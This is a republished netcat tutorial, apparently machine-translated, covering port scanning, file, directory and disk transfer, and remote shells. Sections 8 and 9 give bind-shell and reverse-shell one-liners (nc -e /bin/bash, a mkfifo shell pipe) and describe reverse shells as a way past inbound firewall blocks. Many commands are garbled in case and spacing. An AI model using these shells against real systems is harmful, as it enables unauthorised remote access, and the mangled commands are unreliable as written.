Linux NCAT commands

Source: Internet
Author: User
Tags decrypt mcrypt

Netcat is a Swiss Army knife in a network tool that can read and write data through TCP and UDP on the network. By combining and redirecting with other tools, you can use it in a variety of ways in your script. It's amazing what you can do with the Netcat command.

What Netcat do is create a link between the two computers and return two data streams, and what you can do after that is your imagination. You can create a server, transfer files, chat with friends, stream streaming media, or use it as a standalone client for other protocols.

Here are some examples of using netcat.

[A (172.31.100.7) B (172.31.100.23)]

Linux netcat command examples1. Port Scanning

Port scanning is do by system admin and hackers to find the open ports on some machine. It helps them to identify the venerability in the system.

$NC-Z-v-n 172.31.100.7 21-25

It can work in both TCP and UDP mode, default was TCP mode, to-change-to-UDP use-u option

Z option tell Netcat to use zero IO. I.e the connection are closed as soon as it opens and no actual data exchange take PLA Ce.
V option is used for verbose option.
n option tell Netcat does not use the DNS lookup for the address.

This command would print all of the open ports between to 25.

Banner is a text this services sends when you connects to them. Banner is very usefull when is trying to velberability in the system as it identify the type and version of the Serv Ices. NOTE Not all services may send banner.
Once you has found the open ports you can easily grab the service banner by connecting to them using Netcat.

$ nc-v 172.31.100.7 21

The Linux netcat command would connect to open port and would print the banner of the service running at that port.

translator information

Linux netcat Command instance:

1, port scan

Port scanning is often used by system administrators and hackers to discover ports that are open on some machines to help them identify vulnerabilities in the system.

 $nc-Z-v-n 172.31.100.7 21-25 
can be run in TCP or UDP mode, default is TCP, The-u parameter is adjusted to UDP. The

Z parameter tells Netcat to use 0 IO, closes the connection immediately after the connection is successful, and does not exchange data (thank you @jxing for pointing)

The

v parameter refers to the use of redundancy option (Translator Note: Verbose output)

The

N parameter tells Netcat not to use DNS to reverse-query the domain name of an IP address

This command prints all open ports from 21 to 25. Banner is a text that banner is a text message sent to you by a service that you connect to. Banner information is useful when you are trying to identify a vulnerability or the type and version of a service. However, not all services will send banner.

Once you find an open port, you can easily crawl their banner using the NETCAT connection service. The

 $ nc-v 172.31.100.7 
netcat command connects open port 21 and prints the banner information that is running on this port.

 

2. Chat Server

If you want to chat with your friend there is numerous software and messenger services available At your disposal. But the What if you does not has that luxury anymore like inside Your computer lab, where all outside connections is Restricted, how would you communicate to your friend who was sitting in the next. Don ' t worry my friend because Netcat have a solution for you just create a chat server and a predetermined port a nd He can connects to you.

Server

 $NC-L 1567 

The Linux netcat command starts a TCP server at Port 1567 with stdout and stdin for input output stream i.e. the output is displayed at the shell and input are read from Shell.

Client

 $nc 172.31.100.7 1567 

After this whatever your type on Machine b will appear on A and Vice-versa.

Translator Information Chat Server

If you want to talk to your friends, there are a lot of software and information services available for you to use. However, if you do not have such extravagant configuration, such as you in the computer lab, all the external connection is limited, how do you and all the friends sitting in the next room all day to communicate that? Don't be depressed, Netcat provides a way for you to create a chat server, a pre-determined port, so that he can reach you.

Server

$NC-L 1567

The Netcat command initiates a TCP server on port 1567, and all standard outputs and inputs are output to that port. Both the output and the input are shown in this shell.

Client

$NC 172.31.100.7 1567
Whatever you type on machine B will appear on machine A.

3. File Transfer

Most of the time we is trying to transfer file over network and stumble upon the problem which tool-to-use. There is again numerous methods available like FTP, SCP, SMB etc. But was it really worth the effort to install and configure such complicated software and create a sever at your machine wh En need to transfer one file and only once.

Suppose want to transfer a file ' File.txt ' from A to B
Anyone can is server or client, lets make A as server and B as client.

Server

$NC-L 1567 < file.txt

Client

$NC-n 172.31.100.7 1567 > file.txt

Here we have created a servers at redirected the Netcat input from file file.txt, so if any connection is successful L The Netcat send the content of the file.

Again at the client we had redirect the output of Netcat to file.txt. When B connects to a, a sends the file content and B save this content to file file.txt.

It is not necessary does create the source of file as server we can work in the Eopposeit order also. Like in the below case we be sending file from B to a but server is created at a. This time we are need to redirect ouput of Netcat at-to file and input at-B from file.

B as Server
Server

$NC-L 1567 > file.txt

Client

$NC 172.31.100.23 1567 < file.txt
Translator Information 3, File transfer

Most of the time, we are trying to transfer files over a network or other tool. There are many ways, like FTP,SCP,SMB and so on, but when you just need to transfer files temporarily or once, it's really worth wasting time installing and configuring a software on your machine. Suppose you want to pass a file file.txt from a to B. A or B can be a server or a client, the following, let a as a server, B is the client.

Server

$NC-L 1567 < file.txt
Client
$NC-n 172.31.100.7 1567 > file.txt
Here we create a server on a and redirect the input of netcat to file file.txt, then when any successful connection is made to that port, Netcat will send file contents.

At the client we redirect the output to File.txt, when B connects to A,a to send the file contents, B saves the file contents to file.txt.

There is no need to create a file source as a server, and we can use it in the opposite way. Like the following we send files from B to a, but the server is created on a, this time we only need to redirect the output of the netcat and redirect the input file of B.

B as Server

Server

$NC-L 1567 > file.txt

Client

NC 172.31.100.23 1567 < file.txt
4. Directory Transfer

Sending file is easy if you want to send more than one files, or a whole directory, it easy just use archive tool Tar to archive the files first and then send this archive.

Suppose want to transfer a directory over the network from a to B.

Server

$tar-cvf–dir_name | Nc-l 1567

Client

$NC-N 172.31.100.7 1567 | TAR-XVF-

Here at server A we are creating the tar archive and redirecting it outout at the console through-. Then we were piping it to netcat which was used to send it over network.

At Client We is just downloading the archive file from the server using the netcat and piping it output tar tool to Extr Act the files.

Want to conserve bandwidth by compressing the archive, we can use bzip2 or other tool specific to content of files.

Server

$tar-cvf–dir_name| Bzip2-z | Nc-l 1567

Compress the archive using the Bzip2 utility.

Client

$NC-N 172.31.100.7 1567 | Bzip2-d |TAR-XVF-

Decompress the archive using BZIP2 archive

translator information 4, the directory transport

Sending a file is simple, but if we want to send multiple files, or the entire directory, just as simple, only need to use the compression tool tar, compressed after the sending of compressed packets.

If you want to transfer a directory over the network from A to B.

Server

 $tar-cvf–dir_name | nc-l 1567 

Client

 

 $nc-n 172.31.100.7 1567 | tar -XVF-
here on a server, we create a tar archive package and pass-redirect it on the console, then use the pipeline, redirect to Netcat, Netcat can send it over the network.

At the client we download the package through the Netcat pipeline and then open the file.

If you want to save bandwidth transfer compression packets, we can use bzip2 or other tools to compress.

Server

 

 $tar-cvf–dir_name| bzip2-z | nc-l 1567 

via bzip2 compression

Client

& nbsp;

 $NC-N 172.31.100.7 1567 | bzip2-d |tar-xvf-
use bzip2 to extract

 

5. Encrypt your data when sending over the network

If is worried about the security of data being sent over the networ K can encrypt your data before sending using some tool like mcrypt.

Server

 $nc localhost 1567 | mcrypt–flush–bare-f-q-d-M ECB > file.txt 

Encrypt the data using the MCrypt tool.

Client

 $mcrypt –flush–bare-f-q-m ECB < file.txt | nc-l 1567 

Decrypt the data using the MCrypt tool.
Both The above commands would propmt for PASSOWRD make sure to use the same password on Both.

Here we have the used MCrypt for encryption but the any tool can be used.

translator information 5. Encrypt the data you send over the network

If you are concerned about the security of your data being sent over the Internet, you can encrypt it with a tool such as mcrypt before sending your data.

Server-side

 $nc localhost 1567 | mcrypt–flush–bare-f-q-d-M ECB > file.txt 
encrypt data using the MCrypt tool.

Client

 $mcrypt –flush–bare-f-q-m ECB < file.txt | nc-l 1567 

More than two commands will prompt for a password, ensuring that the same password is used on both ends.

Here we use MCrypt for encryption, using any other encryption tool.

 

6. Stream a video

Not the best method to stream but if the server doesn ' t has the specific tools, then with Netcat we stil L have hope.

Server

 $cat Video.avi | nc-l 1567 

Here is just reading the video file and redirecting its output to Netcat
Client

 $nc 172.31.100.7 1567 | Mplayer-vo X11-cache-

Here is reading the data from the socket and redirecting it to MPlayer.

translator information 6. Streaming video

While not the best way to generate streaming video, if there are no specific tools on the server, using Netcat, we still have the hope of doing this.

Server-side

 $cat Video.avi | nc-l 1567 
Here we just read from a video file and redirect output to the Netcat client
 $nc 172.31.100.7 1567 | mplayer-vo x11-cache-

Here we read the data from the socket and redirect it to MPlayer.

 

7. Cloning a device

If you had just installed and configured a Linux machine and has the to do the same to other machine too And do is want to do the configuration again. No need to repeat the process just boot the other machine with some boot-able pen drive and clones you machine.

Cloning a linux pc is very simple. Suppose your system disk IS/DEV/SDA
Server

 $dd if=/dev/sda | nc-l 1567 

Client

 $nc-N 172.31.1 00.7 1567 | DD OF=/DEV/SDA 

DD is a tool which reads the raw data from the disk, we be just redirecting its output stream thro Ugh a netcat server to the other machine and writing it to the disk, it'll copy everything along with the partition  table. But if we have already do the partition and need to move only the Root partition we can change SDA W ith sda1, sda2 etc depending where out root is installed.

Translator Information 7, cloning a device

If you have installed a Linux machine and need to repeat the same operation to other machines, and you do not want to repeat the configuration again. Do not need to re-configure the installation process, just start another machine with some boot can drive the disk and clone your machine.

Cloning a Linux PC is simple, assuming your system is on disk/DEV/SDA

Server

$DD IF=/DEV/SDA | Nc-l 1567
Client
$NC-N 172.31.100.7 1567 | DD OF=/DEV/SDA
DD is a tool that reads raw data from disk, I redirect its output through the NETCAT server to another machine and writes it to disk, and it copies all of the information along with the partitioned table. But if we have already partitioned and only need to clone the root partition, we can change SDA to sda1,sda2 according to the location of our system root partition. And so on.

8. Opening a shell

We have a used remote Shell using the telnet and ssh but what if they is not installed and we does not has the permission to Install them, then we can create remote shell using Netcat also.

If your netcat support-c and-e option (traditional netcat)
Server

$NC-L 1567-E/bin/bash-i

Client

$NC 172.31.100.7 1567

Here we had created a NETCAT server and indicated it to Run/bin/bash command when connection was successful.

If netcat doesn ' t support-c or-e options (OpenBSD netcat) We can still crate remote shell.
Server

$mkfifo/tmp/tmp_fifo$cat/tmp/tmp_fifo | /bin/sh-i 2>&1 | Nc-l 1567 >/tmp/tmp_fifo

Here we have created a FIFO. We have piped the content of this FIFO file using pipe command to a shell 2>&1 is used to redirect stderr to S Ame file where stdout is redirected which are piped to Netcat server running at Port 1567. Now there again we have redirected the output of Netcat to FIFO file.

Explanation:

The input received from network was written to FIFO file.

The FIFO file is a read by Cat command and it content was sent to SH command.

Sh command processes the received input and write it back to Netcat.

Netcat send the output over the network to client.

Possible because pipe causes the command to run in parallel. The FIFO file is used instead of regular file because the FIFO causes the read-to-wait while if it's an ordinary file th E cat command would has ended as soon as started reading an empty file.

At client are just as simple as conecting to server
Client

$NC-N 172.31.100.7 1567

And you'll get a shell prompt at the client

Translator Information8, open a shell

We have used remote shell-with telnet and ssh, but if these two commands are not installed and we do not have permission to install them, we can also use Netcat to create a remote shell.

Suppose your netcat supports the-C-E parameter (default netcat)

Server

$NC-L 1567-E/bin/bash-i
Client
$NC 172.31.100.7 1567
Here we have created a NETCAT server and indicated that it was executed when it was successfully connected/bin/bash

If Netcat does not support the-C or-e parameter (OpenBSD netcat), we can still create a remote shell

Server

$mkfifo/tmp/tmp_fifo$cat/tmp/tmp_fifo | /bin/sh-i 2>&1 | Nc-l 1567 >/tmp/tmp_fifo
Here we create a FIFO file and then use the Pipeline command to direct the FIFO file content to the shell 2>&1. is used to redirect standard error output and standard output, and then pipe to Netcat to run on port 1567. At this point, we have redirected the output of Netcat to the FIFO file.

Description

Input received from the network is written to the FIFO file

The Cat command reads the FIFO file and sends its contents to the SH command

The SH command process receives input and writes it back to Netcat.

Netcat send output to client via network

As to why it succeeds because the pipeline executes the command in parallel, the FIFO file is used to replace the normal file because the FIFO makes the read wait and if it is a normal file, the cat command ends as soon as possible and begins to read the empty file.

Simply connect to the server on the client

Client

$NC-N 172.31.100.7 1567
you will get a shell prompt on the client

 

9. Reverse Shell

Reverse Shell is shell opened at the client side. Reverse Shell named because unlike other configuration here server is using the services provided by the client.

Server

 $nc-L 1567 

At the client side simply tell Netcat to execute the shell when connection was compl Ete.

Client

 $nc 172.31.100.7 1567-e/bin/bash 

Now what's so special about reverse shell.
Reverse shell is often used to bypass the firewall restrictions like blocked inbound connections. For example, I has a private IP address of 172.31.100.7 and I connect to the outside network with a proxy server. If I want to access a shell at this machine from outside the network say 1.2.3.4 and then I'll use reverse shell for this pur Pose.

Translator Information Reverse shell

A reverse shell is a shell that opens on a client. The reverse shell is named because it differs from other configurations, where the server uses the services provided by the customer.

Service side

$NC-L 1567
On the client side, simply tell Netcat to execute the shell after the connection is complete.

Client

$NC 172.31.100.7 1567-e/bin/bash
Now, what's so special about the reverse shell?
The reverse shell is often used to circumvent firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 172.31.100.7, and I use a proxy server to connect to the external network. If I want to access this machine from outside the network such as 1.2.3.4 Shell, then I will use the reverse shell for this purpose.

Reprint: HTTPS://WWW.OSCHINA.NET/TRANSLATE/LINUX-NETCAT-COMMAND?CMP

Linux NCAT commands

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.